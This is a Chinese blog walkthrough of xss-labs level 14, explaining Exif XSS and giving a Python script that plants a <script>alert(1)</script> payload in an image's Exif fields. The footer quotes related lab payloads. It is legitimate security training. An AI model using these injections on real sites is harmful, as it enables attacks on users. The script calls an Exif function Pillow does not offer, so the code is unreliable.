【网络安全】xss-labs level-14 解题详析

原创 已于 2025-01-06 21:53:10 修改 · 4.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #xsslabs #exif xss

于 2023-08-04 10:45:33 首次发布
本文详细介绍了ExifXSS漏洞的概念,通过示例展示了如何利用此漏洞在图片中植入恶意JavaScript代码,并演示了攻击过程。作者分享了在Xss-Labs靶场的网络安全解题实践。

读者可参考、订阅专栏:Xss-Labs靶场攻防实战

姿势

逻辑后端代码:

在这里插入图片描述
该题涉及exif xss漏洞

exif xss漏洞

Exif XSS 漏洞是一种安全漏洞,存在于图片的 Exif(Exchangeable Image File Format)数据中。
Exif 数据是嵌入在数字图像文件中的元数据,包含有关图像的信息,如拍摄日期、相机型号、GPS 坐标等。浏览器和其他应用程序通常会解析和显示这些数据。

在这里插入图片描述

当存在 Exif XSS 漏洞时,攻击者可以在图像的 Exif 数据中插入恶意的 JavaScript 代码。当用户加载带有恶意 Exif 数据的图像时,浏览器或其他应用程序可能会错误地解析恶意代码,并在受害者的浏览器上执行它。

脚本如下:

import PIL.ExifTags as ExifTags
from PIL import Image

# 打开图像文件
image = Image.open('初始.jpg')

# 获取图像的 Exif 数据
exif_data = image._getexif()

# 将 Exif 数据转为可修改的字典格式
exif_dict = dict(exif_data)

# 修改 Exif 数据
exif_dict[ExifTags.TAGS['Make']] = 'xss语句'
exif_dict[ExifTags.TAGS['Model']] = 'xss语句'

# 将修改后的 Exif 数据重新写回图像
exif_bytes = ExifTags.exif_dict_to_bytes(exif_dict)
image.save('改后.jpg', exif=exif_bytes)

先修改iframe标签:

在这里插入图片描述

接着使用脚本修改图像数据,xss语句为:

<script>alert(1)</script>

再上传图片:

在这里插入图片描述

回显如下:

在这里插入图片描述

xss-lab的level11-level14
qq_64775230的博客
06-16 436
" onfocus=javascript:alert() type="text把这个填在referer里即可。但是t_ref参数接收的是HTTP_REFERER请求头,所以这道题应该是在这里存在漏洞点。所以真正的做法是:因为t_ref直接接收refer,所以直接构造referer。但是为啥这个网站打不开,反正感觉是跳转到这个网站然后再xss。查看了一下源代码,发现接收的是用户的cookie。而且大于号是被删掉了,但是可以使用伪协议。但是要注意的是大于号是被删除了。value里的是UA头。
xss-labs初学者通关解1-18
m0_70483044的博客
11-14 3569
菜鸟都能看懂的新手教程~新手学习指南之xss-labs靶场通关!!错误的地方欢迎指正哦~
XSSxss-labs-level14
Hugu
02-24 1725
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页或请求该网页中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码
XSS LABS - Level 14 过关思路
Blue17 の 小窝
08-28 1796
的文件内容(从靶场介绍中可以直接下载我修改后的靶场文件,没必要自己一个一个改,挺麻烦的,靶场介绍我会在当前靶场过关笔记都发布完成后最后发布,别问为啥不先发布,问就是因为存货。简而言之,就是图片中携带了信息,这个信息包括拍摄设备的参数,拍摄的时间,拍摄的地点等等敏感数据(之前是有过泄露的,CTF 也很爱出)。EXIF,即可交换图像文件格式,是一种包含各种元数据的数据,包括相机设置、拍摄日期和时间,如果打开了 GPS,可能还包括位置信息。这个源码没啥,就是通过一个 iframe 框架,引入了一个新的页面(
渗透测试之---xss-labs闯关【1-14关】
qq_43168364的博客
04-18 3406
万能检测语句 <SCRscriptIPT>’”()Oonnjavascript 这条语句将给我们本次的闯关之旅带来极大的帮助 第一关 [Payload:<script>alert(/pig/)</script>] 首先看到了有查询字符串,我们心花怒放了。 先万能检测一下 好家伙啥都没有过滤,那就很easy了 第二关 [payload: ”>&......
xss-labs靶场环境
最新发布
09-17
为了帮助安全研究人员、开发者及网络安全爱好者更好地理解和防御XSS攻击,诞生了专门的靶场环境,比如xss-labs靶场环境。这是一个用于模拟XSS攻击的平台,它允许用户在一个安全、可控的环境中进行各种XSS攻击实验,...
练习二:靶场练习(xss-labs
07-16
网络安全领域,跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的...靶场练习如xss-labs平台,提供了丰富的练习场景,让学习者能够具体操作和理解XSS攻击的过程和防御策略,是网络安全领域的重要学习资源。
精选资源
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
精选资源
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs是一个专门针对XSS的学习平台,为网络安全从业者和新手提供了丰富的练习场景,帮助他们深入理解和掌握这种攻击手段。 XSS-labs设计了一套关卡制的学习路径,由浅入深,逐步提高难度。每个关卡都代表一种或...
xss-labs-master.rar
05-09
XSS实验室解:从入门到精通》 XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,...通过系统地完成这二十个关卡,你将能够更好地理解XSS的威胁,提高网络安全意识,为保护Web应用安全打下坚实基础。
xss-labs靶场训练(14-20)
ldzhhh的博客
05-25 2104
第十四关 这一关iframe调用的文件地址访问失败,已经无法测试了。 这关主要考察exif xss漏洞,具体可以参考前辈的先知文章:exif xss 第十五关 后台关键代码: <html ng-app> <head> <meta charset="utf-8"> <script src="angular.min.js"></script> <script> window.alert = function
XSS-labs靶场实战(五)——第12-14
永远是少年
11-19 1052
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS-labs靶场实战第7-8关。 一、第十二关 二、第十三关 三、第十四关
[靶场] XSS-Labs 14-20
3hex的博客
09-22 2244
由于有FlashXSS,需要配置一下环境,下载Flash和JPEXS(Flash反编译工具)。 14. Level14-图片EXIF注入 这关卡的iframe引用的地址打不开,我们自己写一个简单的放在本地服务器上,引用对应的URL就行,同时需要打开php_exif开关。 index.php放在根目录,URL为http://127.0.0.1 <?php echo ' <html> <head> <meta http-equiv=.
XSS lab 1~14
m0_74047291的博客
11-10 329
xss初学者的作业
XSS-labs
Mccc_li的博客
04-09 1230
大佬总结的xss的原理 1.level1 输入 < script>alert<\script>就通过了,这道题应该是反射型的xss,数据到了后端再回到浏览器 为什么能够运行? GET输入了name的参数,然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果参数中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。 常见...
xss小游戏1-20,细攻略(level14level19解)
jhfjdf的博客
07-14 3995
XSS小游戏通关攻略 level1 直接修改name参数的值为: <script>alert(1)</script> 解释:利用<script>标签下的alert()弹窗 level2 尝试使用level1的: <script>alert(1)</script> 查看网页源代码: 很明显,level2关卡的值被传到了value里 尝试使用 " onmouseover='alert(1)' 闭合vlaue的双引号 level3 尝试
xss-labs靶场第11-14关基础
m0_74741186的博客
05-16 987
11关至14关基础14关iframe标签的用法,以及闯关
sqli labs less 14
Xiaoxiaoqiang_的博客
03-02 385
sql注入
xss-labs靶场实战全通关细过程(xss靶场解)
热门推荐
金 帛的博客
07-13 6万+
xss靶场一到二十关通关细教程
xss-labs3
08-22
### XSS-Labs Level 3 攻略 XSS-Labs 第三关的目标是利用一个存储型 XSS 漏洞,通过输入特定的恶意代码,使攻击者的脚本在用户访问页面时被执行。本关卡的关键在于理解如何绕过简单的输入过滤机制。 在第三...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值